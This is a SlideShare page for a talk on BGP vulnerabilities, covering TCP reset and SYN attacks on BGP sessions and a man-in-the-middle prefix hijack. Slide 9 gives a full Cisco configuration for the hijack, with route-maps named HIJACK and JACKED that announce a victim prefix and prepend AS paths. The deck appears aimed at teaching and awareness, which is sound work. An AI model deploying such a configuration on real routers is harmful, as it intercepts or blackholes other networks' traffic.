BGP Vulnerability

1,807 views

Published on

BGP Vulnerability - Shutdown Internet

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,807
On SlideShare
0
From Embeds
0
Number of Embeds
1,247
Actions
Shares
0
Downloads
32
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

BGP Vulnerability

  1. 1. HTTP://IPSECS.COM TIME TO SHUTDOWN INTERNET CORE ROUTER
  2. 2. COMMUNICATION Analog communication Digital communication Analog communication to digital communication convergence Internet Protocol
  3. 3. FUTURE COMMUNICATION IP based communication will become the core communication? Scalability and reliability communication infrastructure? Vulnerability and security threat?
  4. 4. CORE COMMUNICATION Access Control List? Default password issue? Weak password? Unencrypted remote login? Routing protocol vulnerability? We will focus on Border Gateway  Protocol (BGP) now
  5. 5. BGP VULNERABILITY BGP messages TCP vulnerability BGP internet man in the middle Documented on RFC 4272
  6. 6. BGP MESSAGES BGP states? idle, connect, active, opensent, openconfirm, established BGP message? open, update, notification, keep alive BGP message modification to poison routing table and Denial of Service Complex and nearly impractical
  7. 7. TCP VULNERABILITY BGP and TCP port 179 SPOOFED TCP RST/FIN? TCP port flooding (SYN) TCP session ends = BGP idle
  8. 8. BGP MAN IN THEMIDDLE More specific network prefix wins Use tracroute to identify routing from source to destination Use route-map and AS-PATH prepending Static routing to give information about next-hop-router
  9. 9. router bgp 100network 10.10.220.0 mask 255.255.255.0neighbor 2.2.4.2 remote­as 40neighbor 2.2.4.2 prefix­list JACKED outneighbor 2.2.4.2 route­map HIJACK outneighbor 4.3.2.1 remote­as 10neighbor 4.3.2.1 prefix­list ANN outneighbor 5.4.3.1 remote­as 60neighbor 5.4.3.1 prefix­list JACKED outneighbor 5.4.3.1 route­map HIJACK out!ip route 10.10.220.0 255.255.255.0 4.3.2.1!ip prefix­list ANN seq 10 permit 2.2.4.0/24ip prefix­list ANN seq 15 permit 4.3.2.0/24ip prefix­list ANN seq 20 permit 5.4.3.0/24!ip prefix­list JACKED seq 10 permit 2.2.4.0/24ip prefix­list JACKED seq 15 permit 4.3.2.0/24ip prefix­list JACKED seq 20 permit 5.4.3.0/24ip prefix­list JACKED seq 25 permit 10.10.220.0/24route­map HIJACK permit 10set as­path prepend 10 20 200
  10. 10. SOME POLICIES Design and topology? Access Control List implementation? Complex password Encrypted connection (SSH & HTTPS)
  11. 11. DEMO BGP ATTACK
  12. 12. QUESTION? ANSWER
  13. 13. THANK YOU 

×